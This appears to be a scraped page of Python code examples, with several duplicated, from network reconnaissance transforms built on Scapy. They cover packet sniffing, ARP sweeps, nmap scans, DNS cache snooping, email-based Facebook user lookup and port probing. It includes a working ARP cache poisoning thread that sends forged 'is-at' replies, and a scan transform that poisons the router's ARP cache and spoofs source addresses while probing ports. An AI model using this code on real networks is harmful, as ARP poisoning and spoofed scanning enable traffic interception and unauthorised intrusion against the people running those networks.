示例#1
0
def passivescan(network, response):

    nodes = {}
    debug('Sniffing network traffic for more hosts.')
    ans = sniff(count=config['scapy/sniffcount'],
                timeout=config['scapy/snifftimeout'])
    debug('Analyzing traffic.')
    for i in ans:
        src = None
        dst = None
        if IP in i:
            src = i[IP].src
            dst = i[IP].dst
        elif ARP in i:
            src = i[ARP].psrc
            dst = i[ARP].pdst
        else:
            continue

        if src in network and src not in nodes:
            nodes[src] = True
            e = IPv4Address(src, internal=True)
            e += Field('ethernet.hwaddr',
                       i.src,
                       displayname='Hardware Address')
            response += e

        if dst in network and dst not in nodes and i.dst != 'ff:ff:ff:ff:ff:ff':
            nodes[dst] = True
            e = IPv4Address(dst, internal=True)
            e += Field('ethernet.hwaddr',
                       i.dst,
                       displayname='Hardware Address')
            response += e
def passivescan(network, response):

    nodes = {}
    debug('Sniffing network traffic for more hosts.')
    ans = sniff(count=config['scapy/sniffcount'], timeout=config['scapy/snifftimeout'])
    debug('Analyzing traffic.')
    for i in ans:
        src = None
        dst = None
        if IP in i:
            src = i[IP].src
            dst = i[IP].dst
        elif ARP in i:
            src = i[ARP].psrc
            dst = i[ARP].pdst
        else:
            continue

        if src in network and src not in nodes:
            nodes[src] = True
            e = IPv4Address(src, internal=True)
            e += Field('ethernet.hwaddr', i.src, displayname='Hardware Address')
            response += e

        if dst in network and dst not in nodes and i.dst != 'ff:ff:ff:ff:ff:ff':
            nodes[dst] = True
            e = IPv4Address(dst, internal=True)
            e += Field('ethernet.hwaddr', i.dst, displayname='Hardware Address')
            response += e
示例#3
0
def findlocalneighbors(network, response):

    debug('ARP sweeping %s' % network.netblock)
    e = Netblock(network.netblock)
    e += Label('CIDR Notation', repr(network))
    e += Label('Network Mask', network.netmask)
    e += Label('Number of Hosts', int(~network.netmask) - 1)
    response += e

    ans = arping(repr(network),
                 timeout=config['scapy/sr_timeout'],
                 verbose=config['scapy/sr_verbose'])[0]

    for i in ans:
        e = IPv4Address(i[1].psrc)
        e.internal = True
        e += Field('ethernet.hwaddr',
                   i[1].hwsrc,
                   displayname='Hardware Address')
        response += e

    if len(ans) <= 1:
        passivescan(network, response)

    return response
def findlocalneighbors(network, response):

    debug('ARP sweeping %s' % network.netblock)
    e = Netblock(network.netblock)
    e += Label('CIDR Notation', repr(network))
    e += Label('Network Mask', network.netmask)
    e += Label('Number of Hosts', int(~network.netmask) - 1)
    response += e

    ans = arping(
        repr(network),
        timeout=config['scapy/sr_timeout'],
        verbose=config['scapy/sr_verbose']
    )[0]

    for i in ans:
        e = IPv4Address(i[1].psrc)
        e.internal = True
        e += Field('ethernet.hwaddr', i[1].hwsrc, displayname='Hardware Address')
        response += e

    if len(ans) <= 1:
        passivescan(network, response)

    return response
示例#5
0
def dotransform(request, response):
    target = request.value
    s = NmapScanner()
    debug('Starting scan on host: %s' % target)
    r = s.scan(['-n', '-A', target] + list(request.params), NmapReportParser)
    addports(r, response)
    addsystems(r, response)
    addreport(r, response, '-A')
    return response
示例#6
0
def dotransform(request, response):

    for r in config['dnscachelookup/resolvers']:
        debug('fetching from %s' % r)
        ans = nslookup(request.value, 255, r, rd=0)
        if ans is None:
            continue
        elif isinstance(ans, list):
            for a in ans:
                addrecord(a.an, response)
        elif ans[DNS].ancount:
            for i in range(0, ans[DNS].ancount):
                addrecord(ans[DNS].an[i], response)
    return response
def getuser(browser, uid, email):

    if uid:

        data = {"viewer": uid, "value": email, "__a": 1}

        r = browser.open("http://www.facebook.com/ajax/typeahead/search.php?%s" % urlencode(data))

        if r.code == 200:
            s = r.read()
            json = loads(s[s.find("{") :])

            if "error" in json:
                raise Exception("%s: %s" % (json["errorSummary"], json["errorDescription"]))
            if json["payload"]["entries"]:
                debug(json["payload"]["entries"][0])
                return json["payload"]["entries"][0]

    return None
def getuser(browser, uid, email):

    if uid:

        data = {'viewer': uid, 'value': email, '__a': 1}

        r = browser.open(
            "http://www.facebook.com/ajax/typeahead/search.php?%s" %
            urlencode(data))

        if r.code == 200:
            s = r.read()
            json = loads(s[s.find('{'):])

            if 'error' in json:
                raise Exception(
                    "%s: %s" %
                    (json['errorSummary'], json['errorDescription']))
            if json['payload']['entries']:
                debug(json['payload']['entries'][0])
                return json['payload']['entries'][0]

    return None
示例#9
0
def dotransform(request, response):
    ip = request.value
    ans = nslookup("www.google.ca", nameserver=ip)
    if ans is not None:
        for site in topsites:
            debug('Resolving %s' % site)
            ans = nslookup(site, nameserver=ip, rd=0)
            if ans[DNS].ancount:
                e = DNSName(site)
                t = Table(['Name', 'Query Class', 'Query Type', 'Data', 'TTL'], 'Cached Answers')
                for i in range(0, ans[DNS].ancount):
                    rr = ans[DNS].an[i]
                    t.addrow([
                            rr.rrname.rstrip('.'),
                            rr.sprintf('%rclass%'),
                            rr.sprintf('%type%'),
                            rr.rdata.rstrip('.'),
                            rr.sprintf('%ttl%')
                        ])
                e += Label('Cached Answers', t, type='text/html')
                response += e
    else:
        response += UIMessage('DNS server did not respond to initial DNS request.')
    return response
示例#10
0
    def run(self):

        debug('ARP cache poisoning thread waiting for victims...')
        ip = q.get()
        debug('Acquired first victim... %s' % ip)

        pe = Ether(src=self.mac, dst=self.rmac)
        pa = ARP(op='is-at', hwsrc=self.mac, psrc=ip, hwdst=self.rmac)

        while True:
            try:
                ip = q.get_nowait()
                if ip is None:
                    break
                else:
                    debug('Changing victim to %s...' % ip)
                    pa.psrc = ip
            except Empty:
                # Send the poison... all your base are belong to us!
                sendp(pe/pa, verbose=0)
                sleep(1/self.poison_rate)
示例#11
0
def findremoteneighbors(ip, response):

    debug('Doing an ARIN whois lookup...')
    w = objectify(whoisip(ip, accept='application/xml'))
    network = IPNetwork([w.startAddress, w.endAddress])

    e = Netblock(network.netblock)
    e += Label('CIDR Notation', repr(network))
    e += Label('Network Mask', network.netmask)
    e += Label('Number of Hosts', int(~network.netmask) - 1)
    response += e

    if network.cidrlen < 24:
        debug(
            'According to ARIN, the CIDR length is %d, reducing it to 24 for the scan...'
            % network.cidrlen)
        network.netblock = '%s/24' % ip

    debug('Probing the host on TCP ports 0-1024...')
    r = sr1(IP(dst=str(ip)) / TCP(dport=(0, 1024)),
            timeout=config['scapy/sr_timeout'],
            verbose=config['scapy/sr_verbose'],
            retry=config['scapy/sr_retries'])

    if r is not None and r.src == ip:
        dport = r.sport

        debug('Performing a traceroute to destination %s' % ip)
        ans = traceroute2(str(ip),
                          TCP(dport=dport),
                          timeout=config['scapy/sr_timeout'],
                          verbose=config['scapy/sr_verbose'],
                          retry=config['scapy/sr_retries'])

        l_hop = ans[-1]
        sl_hop = ans[-2]

        if sl_hop['ttl'] != l_hop['ttl'] - 1:
            debug(
                "It takes %d hops to get to %s but we could only find the router at hop %d (%s)."
                % (l_hop['ttl'], ip, sl_hop['ttl'], sl_hop['ip']))
            debug("Can't find second last hop... aborting...")
        else:
            debug(
                'It takes %d hops to get to %s and it is attached to router %s...'
                % (l_hop['ttl'], ip, sl_hop['ip']))
            debug('Sending probe packets to %s with ttl %d...' %
                  (network, sl_hop['ttl']))

            ans = sr(IP(dst=repr(network), ttl=sl_hop['ttl']) /
                     TCP(dport=dport),
                     timeout=config['scapy/sr_timeout'],
                     verbose=config['scapy/sr_verbose'],
                     retry=config['scapy/sr_retries'])[0]

            for r in ans:
                if r[1].src == sl_hop['ip']:
                    debug('%s is attached to the same router...' % r[0].dst)

                    e = IPv4Address(r[0].dst)

                    alive = sr1(IP(dst=r[0].dst) / TCP(dport=dport),
                                timeout=config['scapy/sr_timeout'],
                                verbose=config['scapy/sr_verbose'],
                                retry=config['scapy/sr_retries'])

                    if alive is not None:
                        e += Field('alive', 'true')
                    response += e

    return response
def findremoteneighbors(ip, response):

    debug('Doing an ARIN whois lookup...')
    w = objectify(whoisip(ip, accept='application/xml'))
    network = IPNetwork([w.startAddress, w.endAddress])

    e = Netblock(network.netblock)
    e += Label('CIDR Notation', repr(network))
    e += Label('Network Mask', network.netmask)
    e += Label('Number of Hosts', int(~network.netmask) - 1)
    response += e

    if network.cidrlen < 24:
        debug('According to ARIN, the CIDR length is %d, reducing it to 24 for the scan...' % network.cidrlen)
        network.netblock = '%s/24' % ip

    debug('Probing the host on TCP ports 0-1024...')
    r = sr1(
        IP(dst=str(ip))/TCP(dport=(0,1024)),
        timeout=config['scapy/sr_timeout'],
        verbose=config['scapy/sr_verbose'],
        retry=config['scapy/sr_retries']
    )

    if r is not None and r.src == ip:
        dport = r.sport

        debug('Performing a traceroute to destination %s' % ip)
        ans = traceroute2(
            str(ip),
            TCP(dport=dport),
            timeout=config['scapy/sr_timeout'],
            verbose=config['scapy/sr_verbose'],
            retry=config['scapy/sr_retries']
        )

        l_hop = ans[-1]
        sl_hop = ans[-2]

        if sl_hop['ttl'] != l_hop['ttl'] - 1:
            debug(
                "It takes %d hops to get to %s but we could only find the router at hop %d (%s)." %
                (l_hop['ttl'], ip, sl_hop['ttl'], sl_hop['ip'])
            )
            debug("Can't find second last hop... aborting...")
        else:
            debug('It takes %d hops to get to %s and it is attached to router %s...' % (l_hop['ttl'], ip, sl_hop['ip']))
            debug('Sending probe packets to %s with ttl %d...' % (network, sl_hop['ttl']))

            ans = sr(
                IP(dst=repr(network), ttl=sl_hop['ttl'])/TCP(dport=dport),
                timeout=config['scapy/sr_timeout'],
                verbose=config['scapy/sr_verbose'],
                retry=config['scapy/sr_retries']
            )[0]

            for r in ans:
                if r[1].src == sl_hop['ip']:
                    debug('%s is attached to the same router...' % r[0].dst)

                    e = IPv4Address(r[0].dst)

                    alive = sr1(
                        IP(dst=r[0].dst)/TCP(dport=dport),
                        timeout=config['scapy/sr_timeout'],
                        verbose=config['scapy/sr_verbose'],
                        retry=config['scapy/sr_retries']
                    )

                    if alive is not None:
                       e += Field('alive', 'true')
                    response += e

    return response
示例#13
0
def dotransform(request, response):

    params = parse_args(request.params)

    ports = portrange(params.target_ports) if params.target_ports is not None else config['irsscan/target_ports']
    dst = params.target_host if params.target_host is not None else config['irsscan/target_host']

    global q
    q = Queue()

    debug('Sending probes to %s' % dst)

    # This is the template used to send traffic
    p = Ether()/IP(dst=dst, id=int(RandShort()))/TCP(dport=ports, sport=int(RandShort()), seq=int(RandInt()))

    # We need to fix these values so that Scapy doesn't poop all over them
    p.dst = router_mac = p.dst
    p.src = my_mac = p.src

    # Begin the evil... mwuahahahahaha..
    apw = ArpCachePoisoner(my_mac, router_mac)
    apw.start()

    # Loop through our IP address block and send out the probes
    for i in iprange(request.value):

        # Queue and set the current IP we are poisoning for the poisoner.
        q.put(str(i))
        p[IP].src = str(i)
        sleep(0.5)

        # Send the probes!
        ans, unans = srp(
            p,
            retry=config['irsscan/sr_retries'],
            timeout=config['irsscan/sr_timeout'],
            verbose=config['irsscan/sr_verbose']
        )

        if ans:
            for a in ans:
                req, res = a
                e = Port(req.dport)
                e.source = req[IP].src
                e.destination = req[IP].dst
                e += Label('Summary', res.summary())
                if TCP in res:
                    e.response = res[TCP].sprintf('TCP:%flags%')
                    e.status = PortStatus.Closed if (res[TCP].flags & 4) else PortStatus.Open
                elif ICMP in res:
                    e.response = res[ICMP].sprintf('ICMP:%type%')
                    e.status = PortStatus.TimedOut
                response += e

        if unans:
            for u in unans:
                e = Port(u.dport)
                e.source = u[IP].src
                e.destination = u[IP].dst
                e.status = PortStatus.TimedOut
                e.response = 'none'
                response += e


    # Goodbye!
    q.put(None)
    apw.join()

    return response
示例#14
0
def onterminate(*args):
    debug('Terminated.')
    exit(0)
示例#15
0
def onterminate():
    debug('Caught signal... exiting.')
    exit(0)
示例#16
0
def dotransform(request, response):
    progress(50)
    debug('This was pointless!')
    progress(100)
    return response + Phrase('Hello %s' % request.value)